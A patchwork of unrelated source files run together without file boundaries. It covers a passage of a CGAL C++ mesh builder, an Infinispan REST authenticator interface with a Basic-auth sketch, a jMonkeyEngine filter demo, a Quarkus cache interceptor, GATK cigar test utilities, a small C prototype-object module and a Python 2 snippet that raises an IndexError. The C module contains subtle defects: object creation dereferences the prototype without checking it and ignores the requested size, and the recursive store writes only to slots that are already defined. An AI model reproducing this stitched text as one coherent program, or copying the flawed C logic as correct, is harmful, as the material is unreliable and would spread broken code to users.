m_is(in_) { } template <typename NamedParameters> bool operator()(Graph& g, const NamedParameters& np) { typedef typename GetK<Graph, NamedParameters>::Kernel Kernel; typedef typename Kernel::Vector_3 Vector; typedef typename Kernel::Point_2 Texture; typedef CGAL::IO::Color Color; typedef typename CGAL::GetVertexPointMap<Graph, NamedParameters>::type VPM; // usually will be true, but might not be the case if using custom type points // CGAL_static_assertion((std::is_same<typename Kernel::Point_3, // typename boost::property_traits<VPM>::value_type>::value)); // CGAL_static_assertion((std::is_same<typename Kernel::Point_3, // typename boost::range_value<Point_container>::type>::value)); typedef typename internal_np::Lookup_named_param_def< internal_np::vertex_normal_map_t, NamedParameters, Constant_property_map<vertex_descriptor, Vector> >::type VNM; typedef typename internal_np::Lookup_named_param_def< internal_np::vertex_color_map_t, NamedParameters, Constant_property_map<vertex_descriptor, Color> >::type VCM; typedef typename internal_np::Lookup_named_param_def< internal_np::vertex_texture_map_t, NamedParameters, Constant_property_map<vertex_descriptor, Texture> >::type VTM; typedef typename internal_np::Lookup_named_param_def< internal_np::face_color_map_t, NamedParameters, Constant_property_map<face_descriptor, Color> >::type FCM; typedef typename boost::property_traits<VNM>::value_type Vertex_normal; typedef typename boost::property_traits<VCM>::value_type Vertex_color; typedef typename boost::property_traits<VTM>::value_type Vertex_texture; typedef typename boost::property_traits<FCM>::value_type Face_color; using parameters::choose_parameter; using parameters::is_default_parameter; using parameters::get_parameter; const bool is_vnm_requested = !(is_default_parameter(get_parameter(np, internal_np::vertex_normal_map))); const bool is_vcm_requested = !(is_default_parameter(get_parameter(np, internal_np::vertex_color_map))); const bool is_vtm_requested = !(is_default_parameter(get_parameter(np, internal_np::vertex_texture_map))); const bool is_fcm_requested = !(is_default_parameter(get_parameter(np, internal_np::face_color_map))); std::vector<Vertex_normal> vertex_normals; std::vector<Vertex_color> vertex_colors; std::vector<Vertex_texture> vertex_textures; std::vector<Face_color> face_colors; const bool verbose = choose_parameter(get_parameter(np, internal_np::verbose), false); const bool binary = 
choose_parameter(get_parameter(np, internal_np::use_binary_mode), true); bool ok = static_cast<Derived*>(this)->read(m_is, m_points, m_faces, parameters::vertex_normal_output_iterator(std::back_inserter(vertex_normals)) .vertex_color_output_iterator(std::back_inserter(vertex_colors)) .vertex_texture_output_iterator(std::back_inserter(vertex_textures)) .face_color_output_iterator(std::back_inserter(face_colors)) .verbose(verbose) .use_binary_mode(binary)); if(!ok) return false; // Construct the graph VPM vpm = choose_parameter(get_parameter(np, internal_np::vertex_point), get_property_map(CGAL::vertex_point, g)); VNM vnm = choose_parameter(get_parameter(np, internal_np::vertex_normal_map), VNM()); VCM vcm = choose_parameter(get_parameter(np, internal_np::vertex_color_map), VCM()); VTM vtm = choose_parameter(get_parameter(np, internal_np::vertex_texture_map), VTM()); FCM fcm = choose_parameter(get_parameter(np, internal_np::face_color_map), FCM()); const bool has_vertex_normals = (is_vnm_requested && !(vertex_normals.empty())); const bool has_vertex_colors = (is_vcm_requested && !(vertex_colors.empty())); const bool has_vertex_textures = (is_vtm_requested && !(vertex_textures.empty())); const bool has_face_colors = (is_fcm_requested && !(face_colors.empty())); if(has_vertex_normals && vertex_normals.size() != m_points.size()) return false; if(has_vertex_colors && vertex_colors.size() != m_points.size()) return false; if(has_vertex_textures && vertex_textures.size() != m_points.size()) return false; if(has_face_colors && face_colors.size() != m_faces.size()) return false; std::vector<vertex_descriptor> vertices(m_points.size()); for(std::size_t id=0, ps=m_points.size(); id<ps; ++id) { vertices[id] = add_vertex(g); put(vpm, vertices[id], m_points[id]); // extra properties if(has_vertex_normals) put(vnm, vertices[id], vertex_normals[id]); if(has_vertex_colors) put(vcm, vertices[id], vertex_colors[id]); if(has_vertex_textures) put(vtm, vertices[id], vertex_textures[id]); } for(size_type i=0, fs=m_faces.size(); i<fs; ++i) { std::vector<vertex_descriptor> face(m_faces[i].size()); for(std::size_t j=0, fis=face.size(); j<fis; ++j) face[j] = vertices[m_faces[i][j]]; face_descriptor f = CGAL::Euler::add_face(face, g); if(f == boost::graph_traits<Graph>::null_face()) return false; if(has_face_colors) put(fcm, f, face_colors[i]); } return is_valid(g); } bool operator()(Graph& g) { return operator()(g, parameters::all_default()); } protected: std::istream& m_is; Point_container m_points; Face_container m_faces; }; } // namespace internal } // namespace IO } // namespace CGAL #endif // CGAL_BGL_IO_GENERIC_FACEGRAPH_BUILDER_H
package org.infinispan.client.rest.impl.okhttp.auth; import java.io.IOException; import okhttp3.Authenticator; import okhttp3.HttpUrl; import okhttp3.Request; import okhttp3.Route; public interface CachingAuthenticator extends Authenticator { Request authenticateWithState(Route route, Request request) throws IOException; static String getCachingKey(Request request) { final HttpUrl url = request.url(); if (url == null) return null; return url.scheme() + ":" + url.host() + ":" + url.port(); } }
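// Minimal sketch of an implementation of the CachingAuthenticator interface above,
// assuming plain HTTP Basic credentials. The class name and constructor are
// hypothetical; the real Infinispan REST client ships its own authenticator
// implementations.
package org.infinispan.client.rest.impl.okhttp.auth;

import java.io.IOException;

import okhttp3.Credentials;
import okhttp3.Request;
import okhttp3.Response;
import okhttp3.Route;

public class BasicCachingAuthenticator implements CachingAuthenticator {
   private final String credential;

   public BasicCachingAuthenticator(String username, String password) {
      this.credential = Credentials.basic(username, password);
   }

   @Override
   public Request authenticate(Route route, Response response) throws IOException {
      // Reactive path: called by OkHttp after a 401, retries with the credential attached.
      return response.request().newBuilder().header("Authorization", credential).build();
   }

   @Override
   public Request authenticateWithState(Route route, Request request) throws IOException {
      // Preemptive path: the caller caches this authenticator under getCachingKey(request)
      // and reuses it for later requests to the same scheme/host/port.
      return request.newBuilder().header("Authorization", credential).build();
   }
}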
<gh_stars>1000+ /* * Copyright (c) 2009-2021 jMonkeyEngine * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are * met: * * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * * Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * * Neither the name of 'jMonkeyEngine' nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ package jme3test.post; import com.jme3.app.SimpleApplication; import com.jme3.input.KeyInput; import com.jme3.input.controls.ActionListener; import com.jme3.input.controls.KeyTrigger; import com.jme3.light.DirectionalLight; import com.jme3.material.Material; import com.jme3.math.*; import com.jme3.post.FilterPostProcessor; import com.jme3.post.filters.*; import com.jme3.renderer.Caps; import com.jme3.renderer.queue.RenderQueue.ShadowMode; import com.jme3.scene.Geometry; import com.jme3.scene.Spatial; import com.jme3.scene.shape.Box; import com.jme3.texture.Texture; import com.jme3.util.SkyFactory; import com.jme3.util.SkyFactory.EnvMapType; import com.jme3.util.TangentBinormalGenerator; public class TestPostFilters extends SimpleApplication implements ActionListener { private FilterPostProcessor fpp; final private Vector3f lightDir = new Vector3f(-1, -1, .5f).normalizeLocal(); private FadeFilter fade; public static void main(String[] args) { TestPostFilters app = new TestPostFilters(); // AppSettings settings = new AppSettings(true); // settings.setRenderer(AppSettings.LWJGL_OPENGL2); // app.setSettings(settings); app.start(); } public void setupFilters() { if (renderer.getCaps().contains(Caps.GLSL100)) { fpp = new FilterPostProcessor(assetManager); // fpp.setNumSamples(4); // fpp.setNumSamples(4); //fpp.addFilter(new ColorOverlayFilter(ColorRGBA.LightGray)); fpp.addFilter(new RadialBlurFilter()); fade = new FadeFilter(1.0f); fpp.addFilter(fade); viewPort.addProcessor(fpp); } } public void setupSkyBox() { Texture envMap; if (renderer.getCaps().contains(Caps.FloatTexture)) { envMap = assetManager.loadTexture("Textures/Sky/St Peters/StPeters.hdr"); } else { envMap = assetManager.loadTexture("Textures/Sky/St Peters/StPeters.jpg"); } Spatial sky = SkyFactory.createSky(assetManager, envMap, new Vector3f(-1f, -1f, -1f), EnvMapType.SphereMap); rootNode.attachChild(sky); } public void setupLighting() { DirectionalLight dl = new DirectionalLight(); dl.setDirection(lightDir); 
dl.setColor(new ColorRGBA(.9f, .9f, .9f, 1)); rootNode.addLight(dl); dl = new DirectionalLight(); dl.setDirection(new Vector3f(1, 0, -1).normalizeLocal()); dl.setColor(new ColorRGBA(.4f, .4f, .4f, 1)); // rootNode.addLight(dl); } public void setupFloor() { Material mat = assetManager.loadMaterial("Textures/Terrain/BrickWall/BrickWall.j3m"); Box floor = new Box(50, 1f, 50); TangentBinormalGenerator.generate(floor); floor.scaleTextureCoordinates(new Vector2f(5, 5)); Geometry floorGeom = new Geometry("Floor", floor); floorGeom.setMaterial(mat); floorGeom.setShadowMode(ShadowMode.Receive); rootNode.attachChild(floorGeom); } public void setupSignpost() { Spatial signpost = assetManager.loadModel("Models/Sign Post/Sign Post.mesh.xml"); Material mat = assetManager.loadMaterial("Models/Sign Post/Sign Post.j3m"); signpost.setMaterial(mat); signpost.rotate(0, FastMath.HALF_PI, 0); signpost.setLocalTranslation(12, 3.5f, 30); signpost.setLocalScale(4); signpost.setShadowMode(ShadowMode.CastAndReceive); rootNode.attachChild(signpost); } @Override public void simpleInitApp() { cam.setLocation(new Vector3f(-32.295086f, 54.80136f, 79.59805f)); cam.setRotation(new Quaternion(0.074364014f, 0.92519957f, -0.24794696f, 0.27748522f)); setupLighting(); setupSkyBox(); setupFloor(); setupSignpost(); setupFilters(); initInput(); } protected void initInput() { flyCam.setMoveSpeed(50); //init input inputManager.addMapping("fadein", new KeyTrigger(KeyInput.KEY_I)); inputManager.addListener(this, "fadein"); inputManager.addMapping("fadeout", new KeyTrigger(KeyInput.KEY_O)); inputManager.addListener(this, "fadeout"); } @Override public void onAction(String name, boolean value, float tpf) { if (name.equals("fadein") && value) { fade.fadeIn(); System.out.println("fade in"); } if (name.equals("fadeout") && value) { fade.fadeOut(); System.out.println("fade out"); } } }
package io.quarkus.cache.runtime; import javax.annotation.Priority; import javax.interceptor.AroundInvoke; import javax.interceptor.Interceptor; import javax.interceptor.InvocationContext; import org.jboss.logging.Logger; import io.quarkus.cache.CacheInvalidateAll; @CacheInvalidateAll(cacheName = "") // The `cacheName` attribute is @Nonbinding. @Interceptor @Priority(CacheInterceptor.BASE_PRIORITY) public class CacheInvalidateAllInterceptor extends CacheInterceptor { private static final Logger LOGGER = Logger.getLogger(CacheInvalidateAllInterceptor.class); private static final String INTERCEPTOR_BINDINGS_ERROR_MSG = "The Quarkus cache extension is not working properly (CacheInvalidateAll interceptor bindings retrieval failed), please create a GitHub issue in the Quarkus repository to help the maintainers fix this bug"; @AroundInvoke public Object intercept(InvocationContext invocationContext) throws Exception { CacheInterceptionContext<CacheInvalidateAll> interceptionContext = getInterceptionContext(invocationContext, CacheInvalidateAll.class, false); if (interceptionContext.getInterceptorBindings().isEmpty()) { // This should never happen. LOGGER.warn(INTERCEPTOR_BINDINGS_ERROR_MSG); } else { for (CacheInvalidateAll binding : interceptionContext.getInterceptorBindings()) { AbstractCache cache = (AbstractCache) cacheManager.getCache(binding.cacheName()).get(); if (LOGGER.isDebugEnabled()) { LOGGER.debugf("Invalidating all entries from cache [%s]", binding.cacheName()); } cache.invalidateAll(); } } return invocationContext.proceed(); } }
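// Hypothetical application bean showing what triggers the interceptor above:
// calling clearForecasts() invalidates every entry of the named cache that
// forecast() populates. Package, class, method and cache names are illustrative
// only and are not part of the Quarkus runtime.
package org.acme.weather;

import javax.enterprise.context.ApplicationScoped;

import io.quarkus.cache.CacheInvalidateAll;
import io.quarkus.cache.CacheResult;

@ApplicationScoped
public class WeatherService {

    @CacheResult(cacheName = "weather-cache")
    public String forecast(String city) {
        return expensiveRemoteCall(city);
    }

    @CacheInvalidateAll(cacheName = "weather-cache")
    public void clearForecasts() {
        // No body needed: CacheInvalidateAllInterceptor clears the cache around this call.
    }

    private String expensiveRemoteCall(String city) {
        return "sunny in " + city;
    }
}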
package org.broadinstitute.hellbender.utils.read; import htsjdk.samtools.Cigar; import htsjdk.samtools.CigarElement; import htsjdk.samtools.CigarOperator; import org.broadinstitute.hellbender.utils.Utils; import org.broadinstitute.hellbender.utils.param.ParamUtils; import org.testng.Assert; import org.testng.annotations.Test; import java.util.ArrayList; import java.util.Collections; import java.util.List; import java.util.Random; /** * Utilities for unit-testing cigars. */ public final class CigarTestUtils { @Test public static void testRandomValidCigarsAreValid() { final List<Cigar> randomCigars = randomValidCigars(new Random(113), 1_000, 5, 50); for (final Cigar cigar : randomCigars) { Assert.assertNotNull(cigar); Assert.assertNull(cigar.isValid("read-name", 0)); } } /** * Returns a list of randomly generted valid CIGAR instances. * @param rdn random number generator to use to generate random elements in the result cigars. * @param count number of random cigars to produce. * @param maximumNumberOfCoreElements maximum number of core (anything except clipping) operations in any given cigar. * @param maximumElementLength maximum length for any cigar element. * @param prepend additional cigar to be added a the beginning of the result list. * @return never {@code null}. */ public static List<Cigar> randomValidCigars(final Random rdn, final int count, final int maximumNumberOfCoreElements, final int maximumElementLength, final Cigar ... prepend) { Utils.nonNull(rdn); ParamUtils.isPositiveOrZero(count, "number of cigars"); Utils.nonNull(prepend); final List<Cigar> result = new ArrayList<>(prepend.length + count); for (final Cigar cigar : prepend) { result.add(cigar); } for (int i = 0; i < count; i++) { final boolean leftClipping = rdn.nextBoolean(); final boolean rightClipping = rdn.nextBoolean(); final boolean leftHardClipping = leftClipping && rdn.nextBoolean(); final boolean rightHardClipping = rightClipping && rdn.nextBoolean(); final int leftClippingLength = leftClipping ? rdn.nextInt(maximumElementLength) + 1 : 0; final int rightClippingLength = rightClipping ? rdn.nextInt(maximumElementLength) + 1: 0; final int leftHardClippingLength = leftHardClipping ? (rdn.nextBoolean() ? leftClippingLength : rdn.nextInt(leftClippingLength) + 1) : 0; final int rightHardClippingLength = rightHardClipping ? (rdn.nextBoolean() ? 
rightClippingLength : rdn.nextInt(rightClippingLength + 1) ): 0; final int leftSoftClippingLength = leftClippingLength - leftHardClippingLength; final int rightSoftClippingLength = rightClippingLength - rightHardClippingLength; final List<CigarElement> coreElements = new ArrayList<>(); final int coreElementCount = rdn.nextInt(maximumNumberOfCoreElements + 1); coreElements.add(new CigarElement(rdn.nextInt(maximumElementLength) + 1, CigarOperator.M)); for (int j = 0; j < coreElementCount; j++) { final CigarOperator op = randomCoreOperator(rdn); coreElements.add(new CigarElement(rdn.nextInt(maximumElementLength) + 1, op)); } Collections.shuffle(coreElements, rdn); if (!coreElements.get(0).getOperator().isAlignment()) { coreElements.add(0, new CigarElement(rdn.nextInt(maximumElementLength) + 1, CigarOperator.M)); } if (!coreElements.get(coreElements.size() - 1).getOperator().isAlignment()) { coreElements.add(new CigarElement(rdn.nextInt(maximumElementLength) + 1, CigarOperator.M)); } final CigarBuilder elements = new CigarBuilder(); if (leftHardClippingLength > 0) elements.add(new CigarElement(leftHardClippingLength, CigarOperator.H)); if (leftSoftClippingLength > 0) elements.add(new CigarElement(leftSoftClippingLength, CigarOperator.S)); elements.addAll(coreElements); if (rightSoftClippingLength > 0) elements.add(new CigarElement(rightSoftClippingLength, CigarOperator.S)); if (rightHardClippingLength > 0) elements.add(new CigarElement(rightHardClippingLength, CigarOperator.H)); result.add(elements.make()); } return result; } private static CigarOperator randomCoreOperator(final Random rdn) { while (true) { final int idx = rdn.nextInt(CigarOperator.values().length); final CigarOperator op = CigarOperator.values()[idx]; if (!op.isClipping()) { return op; } } } }
#include <bvm/obj/obj.h> BvmObj *bvm_obj_create(size_t size, BvmObj *proto, Alloc *alloc) { size_t alloc_size = sizeof(BvmObj) + size * sizeof(BvmVal); BvmObj *self = alloc_malloc(alloc, alloc_size); self->proto = proto; self->len = proto->len; return self; } BvmVal bvm_obj_load(BvmObj *self, size_t index) { if (index >= self->len) { return bvm_val_undef(); } return self->vals[index]; } BvmVal bvm_obj_loadv(BvmObj *self, size_t index) { if (!self) { return bvm_val_undef(); } if (index >= self->len) { return bvm_val_undef(); } if (self->vals[index].type != BVM_UNDEF) { return self->vals[index]; } return bvm_obj_loadv(self->proto, index); } void bvm_obj_store(BvmObj *self, size_t index, BvmVal data) { if (index >= self->len) { return; } self->vals[index] = data; } void bvm_obj_storev(BvmObj *self, size_t index, BvmVal data) { if (!self) { return; } if (index >= self->len) { return; } if (self->vals[index].type != BVM_UNDEF) { self->vals[index] = data; } bvm_obj_storev(self->proto, index, data); } bool bvm_obj_isa(BvmObj *self, BvmObj *proto) { if (!self) { return false; } if (self->proto == proto) { return true; } return bvm_obj_isa(self->proto, proto); }
"""Small snippet to raise an IndexError.""" def index_error(): lst = list('foobar') print lst[len(lst)] if __name__ == '__main__': index_error()